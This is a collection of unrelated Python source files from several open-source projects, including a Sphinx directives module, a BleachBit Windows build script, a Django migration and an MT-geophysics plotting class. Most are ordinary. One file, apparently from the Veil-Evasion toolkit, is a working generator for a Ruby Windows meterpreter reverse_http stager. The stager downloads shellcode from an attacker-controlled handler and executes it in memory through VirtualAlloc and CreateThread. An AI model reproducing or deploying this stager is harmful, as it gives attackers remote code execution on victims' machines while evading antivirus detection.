retnode = nodes.literal_block(text, text, source=fn)
retnode.line = 1
if options.get('language', ''):
retnode['language'] = options['language']
if 'linenos' in options:
retnode['linenos'] = True
state.document.settings.env.note_dependency(rel_fn)
return [retnode]
literalinclude_directive.options = {'linenos': directives.flag,
'language': directives.unchanged}
literalinclude_directive.content = 0
literalinclude_directive.arguments = (1, 0, 0)
directives.register_directive('literalinclude', literalinclude_directive)
# ------ glossary directive ---------------------------------------------------------
def glossary_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
"""Glossary with cross-reference targets for :dfn: roles."""
env = state.document.settings.env
node = addnodes.glossary()
state.nested_parse(content, content_offset, node)
# the content should be definition lists
dls = [child for child in node if isinstance(child, nodes.definition_list)]
# now, extract definition terms to enable cross-reference creation
for dl in dls:
dl['classes'].append('glossary')
for li in dl.children:
if not li.children or not isinstance(li[0], nodes.term):
continue
termtext = li.children[0].astext()
new_id = 'term-' + nodes.make_id(termtext)
if new_id in env.gloss_entries:
new_id = 'term-' + str(len(env.gloss_entries))
env.gloss_entries.add(new_id)
li[0]['names'].append(new_id)
li[0]['ids'].append(new_id)
state.document.settings.env.note_reftarget('term', termtext.lower(),
new_id)
return [node]
glossary_directive.content = 1
glossary_directive.arguments = (0, 0, 0)
directives.register_directive('glossary', glossary_directive)
# ------ acks directive -------------------------------------------------------------
def acks_directive(name, arguments, options, content, lineno,
content_offset, block_text, state, state_machine):
node = addnodes.acks()
state.nested_parse(content, content_offset, node)
if len(node.children) != 1 or not isinstance(node.children[0], nodes.bullet_list):
return [state.document.reporter.warning('.. acks content is not a list',
line=lineno)]
return [node]
acks_directive.content = 1
acks_directive.arguments = (0, 0, 0)
directives.register_directive('acks', acks_directive)
| creasyw/IMTAphy | documentation/doctools/tags/0.2/sphinx/directives.py | Python | gpl-2.0 | 31,058 | 0.002222 |
import json
import time
import jps
class MessageHolder(object):
def __init__(self):
self.saved_msg = []
def __call__(self, msg):
self.saved_msg.append(msg)
def test_pubsub_with_serialize_json():
holder = MessageHolder()
sub = jps.Subscriber('/serialize_hoge1', holder,
deserializer=json.loads)
pub = jps.Publisher('/serialize_hoge1',
serializer=json.dumps)
time.sleep(0.1)
obj = {'da1': 1, 'name': 'hoge'}
pub.publish(obj)
time.sleep(0.1)
sub.spin_once()
assert len(holder.saved_msg) == 1
assert holder.saved_msg[0]['da1'] == 1
assert holder.saved_msg[0]['name'] == 'hoge'
| OTL/jps | test/test_serialize.py | Python | apache-2.0 | 697 | 0 |
from os import environ
from django.conf.urls import include, url
from django.conf import settings
from django.conf.urls.static import static
from .wooey_urls import *
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| wooey/django-djangui | wooey/conf/project_template/urls/user_urls.py | Python | bsd-3-clause | 353 | 0.005666 |
"""
Custom-written pure ruby meterpreter/reverse_http stager.
TODO: better randomization
Module built by @harmj0y
"""
from modules.common import helpers
class Payload:
def __init__(self):
# required options
self.description = "pure windows/meterpreter/reverse_http stager, no shellcode"
self.language = "ruby"
self.extension = "rb"
self.rating = "Normal"
        # options we require user interaction for - format is {Option : [Value, Description]}
self.required_options = { "compile_to_exe" : ["Y", "Compile to an executable"],
"LHOST" : ["", "IP of the metasploit handler"],
"LPORT" : ["", "Port of the metasploit handler"]}
def generate(self):
payloadCode = "require 'rubygems';require 'win32/api';require 'net/http';include Win32\n"
payloadCode += "exit if Object.const_defined?(:Ocra)\n"
payloadCode += "$v = API.new('VirtualAlloc', 'IIII', 'I');$r = API.new('RtlMoveMemory', 'IPI', 'V');$c = API.new('CreateThread', 'IIIIIP', 'I');$w = API.new('WaitForSingleObject', 'II', 'I')\n"
payloadCode += "def ch()\n"
#payloadCode += "\tchk = (\"a\"..\"z\").to_a + (\"A\"..\"Z\").to_a + (\"0\"..\"9\").to_a\n"
#payloadCode += "\t32.times do\n"
#payloadCode += "\t\turi = chk.sample().join()\n"
#payloadCode += "\t\tchk.sort_by {rand}.each do |x|\n"
#payloadCode += "\t\t\treturn(uri + x) if (uri + x).unpack(\"C*\").inject(:+) % 0x100 == 92\n"
#payloadCode += "\t\tend\n"
#payloadCode += "\tend\n"
payloadCode += "\treturn \"WEZf\"\n"
payloadCode += "end\n"
payloadCode += "def ij(sc)\n"
payloadCode += "\tif sc.length > 1000\n"
payloadCode += "\t\tpt = $v.call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n"
payloadCode += "\t\tx = $r.call(pt,sc,sc.length)\n"
payloadCode += "\t\tx = $w.call($c.call(0,0,pt,0,0,0),0xFFFFFFF)\n"
payloadCode += "\tend\nend\n"
payloadCode += "uri = URI.encode(\"http://%s:%s/#{ch()}\")\n" % (self.required_options["LHOST"][0], self.required_options["LPORT"][0])
payloadCode += "uri = URI(uri)\n"
payloadCode += "ij(Net::HTTP.get(uri))"
        return payloadCode
| jorik041/Veil-Evasion | modules/payloads/ruby/meterpreter/rev_http.py | Python | gpl-3.0 | 2,371 | 0.012231 |
# -*- coding: utf-8 -*-
import os
# Author: Sam Erickson
# Date: 2/23/2016
#
# Program Description: This program gives the integer coefficients x,y to the
# equation ax+by=gcd(a,b) given by the extended Euclidean Algorithm.
def extendedEuclid(a, b):
"""
Preconditions - a and b are both positive integers.
    Postconditions - The equation for ax+by=gcd(a,b) has been returned where
x and y are solved.
Input - a : int, b : int
Output - ax+by=gcd(a,b) : string
"""
b, a = max(a, b), min(a, b)
# Format of euclidList is for back-substitution
euclidList = [[b % a, 1, b, -1 * (b // a), a]]
while b % a > 0:
b, a = a, b % a
euclidList.append([b % a, 1, b, -1 * (b // a), a])
if len(euclidList) > 1:
euclidList.pop()
euclidList = euclidList[::-1]
for i in range(1, len(euclidList)):
euclidList[i][1] *= euclidList[i - 1][3]
euclidList[i][3] *= euclidList[i - 1][3]
euclidList[i][3] += euclidList[i - 1][1]
expr = euclidList[len(euclidList) - 1]
strExpr = str(expr[1]) + "*" + str(expr[2]) + " + " + str(expr[3]) + "*" + str(expr[4]) \
+ " = " + str(euclidList[0][0])
return strExpr
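# Example: extendedEuclid(12, 30) returns "1*30 + -2*12 = 6",
# i.e. coefficients 1 and -2 satisfy 1*30 + (-2)*12 = gcd(12, 30) = 6.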
os.system("pause")
| NicovincX2/Python-3.5 | Algorithmique/Algorithme/Algorithme numérique/Algorithme d'Euclide étendu/extended_euclidean_algorithm.py | Python | gpl-3.0 | 1,258 | 0.00159 |
# -*- coding: utf-8 -*-
"""
Description:
Usage:
Author: YingzhiGou
Date: 21/08/2017
"""
from mtpy.gui.SmartMT.Components.FigureSetting import Font
from mtpy.gui.SmartMT.Components.PlotParameter import FrequencyTolerance, Rotation
from mtpy.gui.SmartMT.gui.plot_control_guis import PlotControlStrike
from mtpy.gui.SmartMT.visualization import VisualizationBase
from mtpy.imaging.plotstrike import PlotStrike
from mtpy.utils.matplotlib_utils import get_next_fig_num
class Strike(VisualizationBase):
def __init__(self, parent):
VisualizationBase.__init__(self, parent)
# setup ui
self._plot_control_ui = PlotControlStrike(self._parameter_ui)
self._parameter_ui.add_parameter_groupbox(self._plot_control_ui)
self._rotation_ui = Rotation(self._parameter_ui)
self._parameter_ui.add_parameter_groupbox(self._rotation_ui)
self._tolerance_ui = FrequencyTolerance(self._parameter_ui)
self._tolerance_ui.ui.doubleSpinBox.setValue(0.05) # set default value
self._parameter_ui.add_parameter_groupbox(self._tolerance_ui)
self._font_ui = Font(self._parameter_ui)
self._font_ui.hide_weight()
self._font_ui.hide_color()
self._parameter_ui.add_figure_groupbox(self._font_ui)
self._parameter_ui.end_of_parameter_components()
self.update_ui()
self._params = None
def plot(self):
# set up params
self._params = {
'fn_list': [mt_obj.fn for mt_obj in self._mt_objs],
'rot_z': self._rotation_ui.get_rotation_in_degree(),
'period_tolerance': self._tolerance_ui.get_tolerance_in_float(),
'plot_range': self._plot_control_ui.get_plot_range(),
'plot_type': self._plot_control_ui.get_plot_type(),
'plot_tipper': self._plot_control_ui.get_plot_tipper(),
'pt_error_floor': self._plot_control_ui.get_error_floor(),
'fold': self._plot_control_ui.get_fold(),
'fig_size': (8, 6),
'fig_dpi': 100,
"plot_yn": 'n',
"fig_num": get_next_fig_num()
}
param = self._font_ui.get_size()
if param is not None:
self._params['font_size'] = param
self._plotting_object = PlotStrike(**self._params)
self._plotting_object.plot(show=False)
self._fig = self._plotting_object.fig
def update_ui(self):
pass
@staticmethod
def plot_name():
return "Strike"
@staticmethod
def plot_description():
return """
        <p>This plots the strike estimated from the invariants,
phase tensor and the tipper in either a rose diagram of
xy plot</p>
<p>plots the strike angle as determined by phase tensor
azimuth (Caldwell et al. [2004]) and invariants of the
impedance tensor (Weaver et al. [2003]).</p>
<p>The data is split into decades where the histogram
for each is plotted in the form of a rose diagram with a
        range of 0 to 180 degrees, where 0 is North and 90 is
        East. The median angle of the period band is shown in the
        polar diagram. The top row is the strike estimated from
the invariants of the impedance tensor. The bottom row
is the azimuth estimated from the phase tensor. If
tipper is plotted then the 3rd row is the strike determined
from the tipper, which is orthogonal to the induction
arrow direction.</p>
"""
def get_plot_tooltip(self):
pass
| MTgeophysics/mtpy | mtpy/gui/SmartMT/visualization/strike.py | Python | gpl-3.0 | 3,575 | 0.003077 |
"""
BleachBit
Copyright (C) 2008-2020 Andrew Ziem
https://www.bleachbit.org
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import absolute_import, print_function
import fnmatch
import glob
import imp
import logging
import os
import shutil
import subprocess
import sys
import time
import win_unicode_console
setup_encoding = sys.stdout.encoding
win_unicode_console.enable()
logger = logging.getLogger('setup_py2exe')
logger.setLevel(logging.INFO)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
"%(asctime)s - %(levelname)s - %(message)s", "%Y-%m-%d %H:%M:%S")
ch.setFormatter(formatter)
logger.addHandler(ch)
fast = False
if len(sys.argv) > 1 and sys.argv[1] == 'fast':
logger.info('Fast build')
fast = True
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
logger.info('ROOT_DIR ' + ROOT_DIR)
sys.path.append(ROOT_DIR)
BB_VER = None
GTK_DIR = sys.exec_prefix + '\\Lib\\site-packages\\gnome\\'
NSIS_EXE = 'C:\\Program Files (x86)\\NSIS\\makensis.exe'
NSIS_ALT_EXE = 'C:\\Program Files\\NSIS\\makensis.exe'
if not os.path.exists(NSIS_EXE) and os.path.exists(NSIS_ALT_EXE):
logger.info('NSIS found in alternate location: ' + NSIS_ALT_EXE)
NSIS_EXE = NSIS_ALT_EXE
SZ_EXE = 'C:\\Program Files\\7-Zip\\7z.exe'
# maximum compression with maximum compatibility
# mm=deflate method because deflate64 not widely supported
# mpass=passes for deflate encoder
# mfb=number of fast bytes
# bso0 bsp0 quiet output
# 7-Zip Command Line Reference Wizard: https://axelstudios.github.io/7z/#!/
SZ_OPTS = '-tzip -mm=Deflate -mfb=258 -mpass=7 -bso0 -bsp0' # best compression
if fast:
# fast compression
SZ_OPTS = '-tzip -mx=1 -bso0 -bsp0'
UPX_EXE = ROOT_DIR + '\\upx\\upx.exe'
UPX_OPTS = '--best --crp-ms=999999 --nrv2e'
def archive(infile, outfile):
assert_exist(infile)
if os.path.exists(outfile):
logger.warning(
'Deleting output archive that already exists: ' + outfile)
os.remove(outfile)
cmd = '{} a {} {} {}'.format(SZ_EXE, SZ_OPTS, outfile, infile)
run_cmd(cmd)
assert_exist(outfile)
def recursive_glob(rootdir, patterns):
return [os.path.join(looproot, filename)
for looproot, _, filenames in os.walk(rootdir)
for filename in filenames
if any(fnmatch.fnmatch(filename, pattern) for pattern in patterns)]
def assert_exist(path, msg=None):
if not os.path.exists(path):
logger.error(path + ' not found')
if msg:
logger.error(msg)
sys.exit(1)
def check_exist(path, msg=None):
if not os.path.exists(path):
logger.warning(path + ' not found')
if msg:
logger.warning(msg)
time.sleep(5)
def assert_module(module):
try:
imp.find_module(module)
except ImportError:
logger.error('Failed to import ' + module)
logger.error('Process aborted because of error!')
sys.exit(1)
def assert_execute(args, expected_output):
"""Run a command and check it returns the expected output"""
actual_output = subprocess.check_output(args).decode(setup_encoding)
if -1 == actual_output.find(expected_output):
raise RuntimeError('When running command {} expected output {} but got {}'.format(
args, expected_output, actual_output))
def assert_execute_console():
"""Check the application starts"""
logger.info('Checking bleachbit_console.exe starts')
assert_execute([r'dist\bleachbit_console.exe', '--gui', '--exit', '--no-uac'],
'Success')
def run_cmd(cmd):
logger.info(cmd)
p = subprocess.Popen(cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
logger.info(stdout.decode(setup_encoding))
if stderr:
logger.error(stderr.decode(setup_encoding))
def sign_code(filename):
if os.path.exists('CodeSign.bat'):
logger.info('Signing code: %s' % filename)
cmd = 'CodeSign.bat %s' % filename
run_cmd(cmd)
else:
logger.warning('CodeSign.bat not available for %s' % filename)
def get_dir_size(start_path='.'):
# http://stackoverflow.com/questions/1392413/calculating-a-directory-size-using-python
total_size = 0
for dirpath, dirnames, filenames in os.walk(start_path):
for f in filenames:
fp = os.path.join(dirpath, f)
total_size += os.path.getsize(fp)
return total_size
def copytree(src, dst):
# Microsoft xcopy is about twice as fast as shutil.copytree
logger.info('copying {} to {}'.format(src, dst))
cmd = 'xcopy {} {} /i /s /q'.format(src, dst)
os.system(cmd)
def count_size_improvement(func):
def wrapper():
import time
t0 = time.time()
size0 = get_dir_size('dist')
func()
size1 = get_dir_size('dist')
t1 = time.time()
logger.info('Reduced size of the dist directory by {:,} B from {:,} B to {:,} B in {:.1f} s'.format(
size0 - size1, size0, size1, t1 - t0))
return wrapper
def environment_check():
"""Check the build environment"""
logger.info('Checking for translations')
assert_exist('locale', 'run "make -C po local" to build translations')
logger.info('Checking for GTK')
assert_exist(GTK_DIR)
logger.info('Checking PyGI library')
assert_module('gi')
logger.info('Checking Python win32 library')
assert_module('win32file')
logger.info('Checking for CodeSign.bat')
check_exist('CodeSign.bat', 'Code signing is not available')
logger.info('Checking for NSIS')
check_exist(
NSIS_EXE, 'NSIS executable not found: will try to build portable BleachBit')
def build():
"""Build the application"""
logger.info('Deleting directories build and dist')
shutil.rmtree('build', ignore_errors=True)
shutil.rmtree('dist', ignore_errors=True)
shutil.rmtree('BleachBit-Portable', ignore_errors=True)
logger.info('Running py2exe')
shutil.copyfile('bleachbit.py', 'bleachbit_console.py')
cmd = sys.executable + ' -OO setup.py py2exe'
run_cmd(cmd)
assert_exist('dist\\bleachbit.exe')
assert_exist('dist\\bleachbit_console.exe')
os.remove('bleachbit_console.py')
if not os.path.exists('dist'):
os.makedirs('dist')
logger.info('Copying GTK files and icon')
copytree(GTK_DIR + '\\etc', 'dist\\etc')
copytree(GTK_DIR + '\\lib', 'dist\\lib')
for subpath in ['fontconfig', 'fonts', 'icons', 'themes']:
copytree(os.path.join(GTK_DIR, 'share', subpath),
'dist\\share\\' + subpath)
SCHEMAS_DIR = 'share\\glib-2.0\\schemas'
os.makedirs(os.path.join('dist', SCHEMAS_DIR))
shutil.copyfile(os.path.join(GTK_DIR, SCHEMAS_DIR, 'gschemas.compiled'),
os.path.join('dist', SCHEMAS_DIR, 'gschemas.compiled'))
shutil.copyfile('bleachbit.png', 'dist\\share\\bleachbit.png')
# for pop-up notification
shutil.copyfile('windows\\bleachbit.ico', 'dist\\share\\bleachbit.ico')
for dll in glob.glob1(GTK_DIR, '*.dll'):
shutil.copyfile(os.path.join(GTK_DIR, dll), 'dist\\'+dll)
os.mkdir('dist\\data')
shutil.copyfile('data\\app-menu.ui', 'dist\\data\\app-menu.ui')
logger.info('Copying themes')
copytree('themes', 'dist\\themes')
logger.info('Copying CA bundle')
import requests
shutil.copyfile(requests.utils.DEFAULT_CA_BUNDLE_PATH,
os.path.join('dist', 'cacert.pem'))
dist_locale_dir = r'dist\share\locale'
logger.info('Copying GTK localizations')
shutil.rmtree(dist_locale_dir, ignore_errors=True)
os.makedirs(dist_locale_dir)
locale_dir = os.path.join(GTK_DIR, 'share\\locale\\')
for f in recursive_glob(locale_dir, ['gtk30.mo']):
if not f.startswith(locale_dir):
continue
rel_f = f[len(locale_dir):]
os.makedirs(os.path.join(dist_locale_dir, os.path.dirname(rel_f)))
shutil.copyfile(f, os.path.join(dist_locale_dir, rel_f))
assert_exist(os.path.join(dist_locale_dir, r'es\LC_MESSAGES\gtk30.mo'))
logger.info('Copying BleachBit localizations')
copytree('locale', dist_locale_dir)
assert_exist(os.path.join(dist_locale_dir, r'es\LC_MESSAGES\bleachbit.mo'))
logger.info('Copying BleachBit cleaners')
if not os.path.exists('dist\\share\\cleaners'):
os.makedirs('dist\\share\\cleaners')
cleaners_files = recursive_glob('cleaners', ['*.xml'])
for file in cleaners_files:
shutil.copy(file, 'dist\\share\\cleaners')
logger.info('Checking for CleanerML')
assert_exist('dist\\share\\cleaners\\internet_explorer.xml')
logger.info('Copying license')
shutil.copy('COPYING', 'dist')
logger.info('Copying msvcr100.dll')
shutil.copy('C:\\WINDOWS\\system32\\msvcr100.dll', 'dist\\msvcr100.dll')
sign_code('dist\\bleachbit.exe')
sign_code('dist\\bleachbit_console.exe')
assert_execute_console()
@count_size_improvement
def delete_unnecessary():
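    """Delete bundled files and directories that are not needed at runtime."""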
logger.info('Deleting unnecessary files')
# Remove SVG to reduce space and avoid this error
# Error loading theme icon 'dialog-warning' for stock: Unable to load image-loading module: C:/PythonXY/Lib/site-packages/gtk-2.0/runtime/lib/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-svg.dll: `C:/PythonXY/Lib/site-packages/gtk-2.0/runtime/lib/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-svg.dll': The specified module could not be found.
# https://bugs.launchpad.net/bleachbit/+bug/1650907
delete_paths = [
r'_win32sysloader.pyd',
r'lib\gdk-pixbuf-2.0',
r'lib\gdbus-2.0',
r'perfmon.pyd',
r'servicemanager.pyd',
r'share\themes\default',
r'share\themes\emacs',
r'share\fontconfig',
r'share\icons\highcontrast',
r'share\themes',
r'win32evtlog.pyd',
r'win32pipe.pyd',
r'win32wnet.pyd',
]
for path in delete_paths:
path = r'dist\{}'.format(path)
if not os.path.exists(path):
logger.warning('Path does not exist: ' + path)
continue
if os.path.isdir(path):
this_dir_size = get_dir_size(path)
shutil.rmtree(path, ignore_errors=True)
logger.info('Deleting directory {} saved {:,} B'.format(
path, this_dir_size))
else:
logger.info('Deleting file {} saved {:,} B'.format(
path, os.path.getsize(path)))
os.remove(path)
@count_size_improvement
def delete_icons():
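    """Delete bundled PNG/SVG icons that are not on the whitelist of icons actually used."""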
logger.info('Deleting unused PNG/SVG icons')
# This whitelist comes from analyze_process_monitor_events.py
icon_whitelist = [
'edit-clear-all.png',
'edit-delete.png',
'edit-find.png',
'list-add-symbolic.svg', # spin box in chaff dialog
'list-remove-symbolic.svg', # spin box in chaff dialog
'pan-down-symbolic.svg', # there is no pan-down.png
'pan-end-symbolic.svg', # there is no pan-end.png
'process-stop.png', # abort on toolbar
'window-close-symbolic.svg', # png does not get used
'window-maximize-symbolic.svg', # no png
'window-minimize-symbolic.svg', # no png
'window-restore-symbolic.svg' # no png
]
strip_list = recursive_glob(r'dist\share\icons', ['*.png', '*.svg'])
for f in strip_list:
if os.path.basename(f) not in icon_whitelist:
os.remove(f)
else:
logger.info('keeping whitelisted icon: %s', f)
def remove_empty_dirs(root):
"""Remove empty directories"""
import scandir
for entry in scandir.scandir(root):
if entry.is_dir():
remove_empty_dirs(entry.path)
if not os.listdir(entry.path):
logger.info('Deleting empty directory: %s' % entry.path)
os.rmdir(entry.path)
@count_size_improvement
def clean_translations():
"""Clean translations (localizations)"""
logger.info('Cleaning translations')
if os.path.exists(r'dist\share\locale\locale.alias'):
os.remove(r'dist\share\locale\locale.alias')
else:
logger.warning('locale.alias does not exist')
pygtk_translations = os.listdir('dist/share/locale')
supported_translations = [f[3:-3] for f in glob.glob('po/*.po')]
for pt in pygtk_translations:
if pt not in supported_translations:
path = 'dist/share/locale/' + pt
shutil.rmtree(path)
@count_size_improvement
def strip():
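    """Strip debug symbols from the bundled DLL and PYD files using strip.exe."""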
logger.info('Stripping executables')
strip_list = recursive_glob('dist', ['*.dll', '*.pyd'])
strip_whitelist = ['_sqlite3.dll']
strip_files_str = [f for f in strip_list if os.path.basename(
f) not in strip_whitelist]
# Process each file individually in case it is locked. See
# https://github.com/bleachbit/bleachbit/issues/690
for strip_file in strip_files_str:
if os.path.exists('strip.tmp'):
os.remove('strip.tmp')
if not os.path.exists(strip_file):
logger.error('%s does not exist before stripping', strip_file)
continue
cmd = 'strip.exe --strip-debug --discard-all --preserve-dates -o strip.tmp %s' % strip_file
run_cmd(cmd)
if not os.path.exists(strip_file):
logger.error('%s does not exist after stripping', strip_file)
continue
if not os.path.exists('strip.tmp'):
logger.warning('strip.tmp missing while processing %s', strip_file)
continue
error_counter = 0
while error_counter < 100:
try:
os.remove(strip_file)
except PermissionError:
logger.warning(
'permissions error while removing %s', strip_file)
time.sleep(.1)
error_counter += 1
else:
break
if error_counter > 1:
logger.warning('error counter %d while removing %s',
error_counter, strip_file)
if not os.path.exists(strip_file):
os.rename('strip.tmp', strip_file)
@count_size_improvement
def upx():
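    """Compress the bundled DLL and PYD files with UPX, unless fast mode is set or UPX is missing."""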
if fast:
logger.warning('Fast mode: Skipped executable with UPX')
return
if not os.path.exists(UPX_EXE):
logger.warning(
'UPX not found. To compress executables, install UPX to: ' + UPX_EXE)
return
logger.info('Compressing executables')
# Do not compress bleachbit.exe and bleachbit_console.exe to avoid false positives
    # with antivirus software. Not much space is gained with these small files, anyway.
upx_files = recursive_glob('dist', ['*.dll', '*.pyd'])
cmd = '{} {} {}'.format(UPX_EXE, UPX_OPTS, ' '.join(upx_files))
run_cmd(cmd)
@count_size_improvement
def delete_linux_only():
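    """Delete cleaner definitions that are not usable on this operating system (e.g., Linux-only cleaners)."""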
logger.info('Checking for Linux-only cleaners')
files = recursive_glob('dist/share/cleaners/', ['*.xml'])
for fn in files:
from bleachbit.CleanerML import CleanerML
cml = CleanerML(fn)
if not cml.get_cleaner().is_usable():
logger.warning('Deleting cleaner not usable on this OS: ' + fn)
os.remove(fn)
@count_size_improvement
def recompress_library():
"""Recompress library.zip"""
if fast:
logger.warning('Fast mode: Skipped recompression of library.zip')
return
if not os.path.exists(SZ_EXE):
logger.warning(SZ_EXE + ' does not exist')
return
logger.info('Recompressing library.zip with 7-Zip')
# extract library.zip
if not os.path.exists('dist\\library'):
os.makedirs('dist\\library')
cmd = SZ_EXE + ' x dist\\library.zip' + ' -odist\\library -y'
run_cmd(cmd)
file_size_old = os.path.getsize('dist\\library.zip')
os.remove('dist\\library.zip')
# clean unused modules from library.zip
delete_paths = ['distutils', 'plyer\\platforms\\android', 'plyer\\platforms\\ios', 'plyer\\platforms\\linux', 'plyer\\platforms\\macosx']
for p in delete_paths:
shutil.rmtree(os.path.join('dist', 'library', p))
# recompress library.zip
cmd = SZ_EXE + ' a {} ..\\library.zip'.format(SZ_OPTS)
logger.info(cmd)
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd='dist\\library')
stdout, stderr = p.communicate()
logger.info(stdout.decode(setup_encoding))
if stderr:
logger.error(stderr.decode(setup_encoding))
file_size_new = os.path.getsize('dist\\library.zip')
file_size_diff = file_size_old - file_size_new
    logger.info('Recompression of library.zip reduced size by {:,} from {:,} to {:,}'.format(
file_size_diff, file_size_old, file_size_new))
shutil.rmtree('dist\\library', ignore_errors=True)
assert_exist('dist\\library.zip')
def shrink():
"""After building, run all the applicable size optimizations"""
delete_unnecessary()
delete_icons()
clean_translations()
remove_empty_dirs('dist')
try:
strip()
except Exception:
logger.exception(
'Error when running strip. Does your PATH have MINGW with binutils?')
if not fast:
upx()
assert_execute_console()
logger.info('Purging unnecessary GTK+ files')
# FIXME: move clean-dist into this program
cmd = sys.executable + ' setup.py clean-dist'
run_cmd(cmd)
delete_linux_only()
recompress_library()
    # Calculate the size of the dist folder, as shrinking it is the goal.
logger.info('Final size of the dist folder: {:,}'.format(
get_dir_size('dist')))
def package_portable():
"""Package the portable version"""
logger.info('Building portable')
copytree('dist', 'BleachBit-Portable')
with open("BleachBit-Portable\\BleachBit.ini", "w") as text_file:
text_file.write("[Portable]")
archive('BleachBit-Portable', 'BleachBit-{}-portable.zip'.format(BB_VER))
# NSIS
def nsis(opts, exe_name, nsi_path):
"""Run NSIS with the options to build exe_name"""
if os.path.exists(exe_name):
logger.info('Deleting old file: ' + exe_name)
os.remove(exe_name)
cmd = NSIS_EXE + \
' {} /DVERSION={} {}'.format(opts, BB_VER, nsi_path)
run_cmd(cmd)
assert_exist(exe_name)
sign_code(exe_name)
def package_installer(nsi_path=r'windows\bleachbit.nsi'):
"""Package the installer"""
if not os.path.exists(NSIS_EXE):
logger.warning('NSIS not found, so not building installer')
return
logger.info('Building installer')
exe_name = 'windows\\BleachBit-{0}-setup.exe'.format(BB_VER)
# Was:
#opts = '' if fast else '/X"SetCompressor /FINAL zlib"'
# Now: Done in NSIS file!
opts = '' if fast else '/V3 /Dpackhdr /DCompressor'
nsis(opts, exe_name, nsi_path)
if not fast:
# Was:
# nsis('/DNoTranslations',
# Now: Compression gets now done in NSIS file!
nsis('/V3 /DNoTranslations /Dpackhdr /DCompressor',
'windows\\BleachBit-{0}-setup-English.exe'.format(BB_VER),
nsi_path)
if os.path.exists(SZ_EXE):
logger.info('Zipping installer')
# Please note that the archive does not have the folder name
outfile = ROOT_DIR + \
'\\windows\\BleachBit-{0}-setup.zip'.format(BB_VER)
infile = ROOT_DIR + '\\windows\\BleachBit-{0}-setup.exe'.format(BB_VER)
archive(infile, outfile)
else:
logger.warning(SZ_EXE + ' does not exist')
if '__main__' == __name__:
logger.info('Getting BleachBit version')
import bleachbit
BB_VER = bleachbit.APP_VERSION
build_number = os.getenv('APPVEYOR_BUILD_NUMBER')
if build_number:
BB_VER = '%s.%s' % (BB_VER, build_number)
logger.info('BleachBit version ' + BB_VER)
environment_check()
build()
shrink()
package_portable()
package_installer()
# Clearly show the sizes of the files that end users download because the
# goal is to minimize them.
os.system(r'dir *.zip windows\*.exe windows\*.zip')
logger.info('Success!')
| tstenner/bleachbit | windows/setup_py2exe.py | Python | gpl-3.0 | 20,767 | 0.000626 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
{
"name": "Stock - Packaging information",
"version": "1.0",
"depends": [
"stock",
"product_packaging_through_attributes",
],
"author": "OdooMRP team,"
"AvanzOSC,"
"Serv. Tecnol. Avanzados - Pedro M. Baeza",
"website": "http://www.odoomrp.com",
"contributors": [
"Oihane Crucelaegui <oihanecrucelaegi@avanzosc.es>",
"Pedro M. Baeza <pedro.baeza@serviciosbaeza.com>",
"Ana Juaristi <ajuaristio@gmail.com>"
],
"category": "Custom Module",
"summary": "",
"data": [
"views/stock_view.xml",
],
"installable": True,
"auto_install": False,
}
| InakiZabala/odoomrp-wip | stock_packaging_info/__openerp__.py | Python | agpl-3.0 | 1,532 | 0 |
# pylint: disable=missing-module-docstring, missing-class-docstring
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hc_dpd', '0011_align_with_hc_20220301'),
]
operations = [
migrations.AlterField(
model_name='company',
name='company_name',
field=models.CharField(blank=True, max_length=80, null=True),
),
migrations.AlterField(
model_name='company',
name='street_name',
field=models.CharField(blank=True, max_length=80, null=True),
),
]
| studybuffalo/studybuffalo | study_buffalo/hc_dpd/migrations/0012_align_with_hc_20220301_2.py | Python | gpl-3.0 | 620 | 0 |
#!/usr/bin/env python3
# Copyright 2016 - 2021 Bas van Meerten and Wouter Franssen
# This file is part of ssNake.
#
# ssNake is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ssNake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ssNake. If not, see <http://www.gnu.org/licenses/>.
import re
import numpy as np
import scipy.special
import scipy.integrate
import hypercomplex as hc
def safeEval(inp, length=None, Type='All', x=None):
"""
Creates a more restricted eval environment.
Note that this method is still not acceptable to process strings from untrusted sources.
Parameters
----------
inp : str
String to evaluate.
length : int or float, optional
The variable length will be set to this value.
By default the variable length is not set.
Type : {'All', 'FI', 'C'}, optional
Type of expected output. 'All' will return all types, 'FI' will return a float or int, and 'C' will return a complex number.
By default Type is set to 'All'
x : array_like, optional
The variable x is set to this variable,
By default the variable x is not used.
Returns
-------
Object
The result of the evaluated string.
"""
env = vars(np).copy()
env.update(vars(hc).copy())
env.update(vars(scipy.special).copy())
